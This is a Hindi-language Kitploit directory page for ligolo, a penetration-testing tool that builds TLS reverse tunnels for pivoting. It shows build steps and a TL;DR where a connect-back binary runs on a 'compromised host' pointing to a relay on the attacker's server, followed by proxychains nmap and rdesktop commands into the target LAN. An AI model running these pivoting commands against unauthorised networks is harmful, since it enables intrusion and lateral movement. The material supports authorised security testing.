Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ligolo — पेंटेस्टर्स द्वारा पेंटेस्टर्स के लिए रिवर्स टनलिंग को आसान बनाया गया https://sysdream.com/ | Kitploit
उपकरण/GitHubGitHub/sysdream/ligolo
पार्श्व आंदोलनपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubsysdream/ligolo

ligolo

पेंटेस्टर्स द्वारा पेंटेस्टर्स के लिए रिवर्स टनलिंग को आसान बनाया गया https://sysdream.com/

रिपॉजिटरी देखें
1.8k22716 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Ligolo : पेंटेस्टर्स के लिए रिवर्स टनलिंग को आसान बनाया गया, पेंटेस्टर्स द्वारा

forthebadge forthebadge

Ligolo

विषय सूची

  • परिचय
  • उपयोग का मामला
  • त्वरित डेमो
  • प्रदर्शन
  • उपयोग
    • सेटअप / कंपाइल करना
    • इसका उपयोग कैसे करें?
    • TL;DR
    • विकल्प
  • विशेषताएँ
  • करने के लिए
  • लाइसेंसिंग
  • श्रेय

परिचय

Ligolo एक सरल और हल्का उपकरण है जो रिवर्स कनेक्शन से SOCKS5 या TCP टनल स्थापित करने के लिए है, पूर्ण सुरक्षा में (TLS प्रमाणपत्र जो दीर्घवृत्तीय वक्र के साथ है)।

यह Meterpreter के Autoroute + Socks4a के समान है, लेकिन अधिक स्थिर और तेज़ है।

उपयोग का मामला

आपने अपने बाहरी ऑडिट के दौरान किसी Windows / Linux / Mac सर्वर से समझौता किया। यह सर्वर LAN नेटवर्क के अंदर स्थित है और आप इस नेटवर्क पर अन्य मशीनों से कनेक्शन स्थापित करना चाहते हैं।

Ligolo आंतरिक सर्वर के संसाधनों तक पहुँचने के लिए एक टनल स्थापित कर सकता है।

त्वरित डेमो

Proxychains का उपयोग करके RDP कनेक्शन का रिले (WAN)।

RDP

प्रदर्शन

यहाँ दो 100mb/s होस्ट (ligolo / localrelay) के बीच स्पीडटेस्ट का एक स्क्रीनशॉट है। प्रदर्शन सिस्टम और नेटवर्क कॉन्फ़िगरेशन के आधार पर भिन्न हो सकता है।

Speedtest

उपयोग

सेटअप / कंपाइल करना

सुनिश्चित करें कि Go स्थापित और काम कर रहा है।

  1. Ligolo और निर्भरताएँ प्राप्त करें
root@kitploit:~
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
  1. स्व-हस्ताक्षरित TLS प्रमाणपत्र उत्पन्न करें ( certs फ़ोल्डर में रखा जाएगा)
root@kitploit:~
make certs TLS_HOST=example.com

नोट: आप build को कॉल करते समय TLS_CERT make विकल्प का उपयोग करके अपने स्वयं के प्रमाणपत्रों का भी उपयोग कर सकते हैं। उदाहरण: make build-all TLS_CERT=certs/mycert.pem।

  1. बिल्ड करें
  • 3.1. सभी आर्किटेक्चर के लिए
root@kitploit:~
make build-all
  • 3.2. (या) वर्तमान आर्किटेक्चर के लिए
root@kitploit:~
make build

इसका उपयोग कैसे करें?

Ligolo में दो मॉड्यूल शामिल हैं:

  • localrelay
  • ligolo

Localrelay को नियंत्रण सर्वर (हमलावर सर्वर) पर चलाने का इरादा है।

Ligolo वह प्रोग्राम है जिसे लक्ष्य कंप्यूटर पर चलाना है।

Localrelay के लिए, आप डिफ़ॉल्ट विकल्प छोड़ सकते हैं। यह पोर्ट 5555 पर सभी इंटरफेस पर सुनता है और ligolo (-relayserver पैरामीटर) से कनेक्शन की प्रतीक्षा करता है।

Ligolo के लिए, आपको -relayserver ip:port पैरामीटर का उपयोग करके रिले सर्वर (या आपके हमले के सर्वर) का IP पता निर्दिष्ट करना होगा।

आप सहायता के लिए -h विकल्प का उपयोग कर सकते हैं।

एक बार Ligolo और LocalRelay के बीच कनेक्शन स्थापित हो जाने के बाद, रिले सर्वर पर TCP पोर्ट 1080 पर एक SOCKS5 प्रॉक्सी स्थापित की जाएगी (आप -localserver विकल्प का उपयोग करके TCP पता/पोर्ट बदल सकते हैं)।

उसके बाद, आपको बस अपने पसंदीदा टूल (उदाहरण के लिए Proxychains) का उपयोग करना है, और क्लाइंट के LAN नेटवर्क का अन्वेषण करना है।

TL;DR

अपने हमले के सर्वर पर।

root@kitploit:~
./bin/localrelay_linux_amd64

समझौता किए गए होस्ट पर।

root@kitploit:~
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

एक बार कनेक्शन स्थापित हो जाने के बाद, ProxyChains कॉन्फ़िग फ़ाइल (हमले के सर्वर पर) में निम्नलिखित पैरामीटर सेट करें:

root@kitploit:~
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5     127.0.0.1 1080

लाभ उठाएँ।

root@kitploit:~
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123

विकल्प

Localrelay विकल्प:

root@kitploit:~
Usage of localrelay:
  -certfile string
    	The TLS server certificate (default "certs/server.crt")
  -keyfile string
    	The TLS server key (default "certs/server.key")
  -localserver string
    	The local server address (your proxychains parameter) (default "127.0.0.1:1080")
  -relayserver string
    	The relay server listening address (the connect-back address) (default "0.0.0.0:5555")

Ligolo विकल्प:

root@kitploit:~
Usage of ligolo:
  -autorestart
    	Attempt to reconnect in case of an exception
  -relayserver string
    	The relay server (the connect-back address) (default "127.0.0.1:5555")
  -skipverify
    	Skip TLS certificate pinning verification
  -targetserver string
    	The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server

विशेषताएँ

  • TLS 1.3 टनल TLS पिनिंग के साथ
  • बहु-प्लेटफ़ॉर्म (Windows / Linux / Mac / …)
  • मल्टीप्लेक्सिंग (सभी प्रवाहों के लिए 1 TCP कनेक्शन)
  • SOCKS5 प्रॉक्सी या साधारण रिले

करने के लिए

  • बेहतर टाइमआउट हैंडलिंग
  • SOCKS5 UDP समर्थन
  • mTLS लागू करना

लाइसेंसिंग

GNU जनरल पब्लिक लाइसेंस v3.0 (देखें LICENSING)।

श्रेय

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>

Sysdream

टूल डाउनलोड करें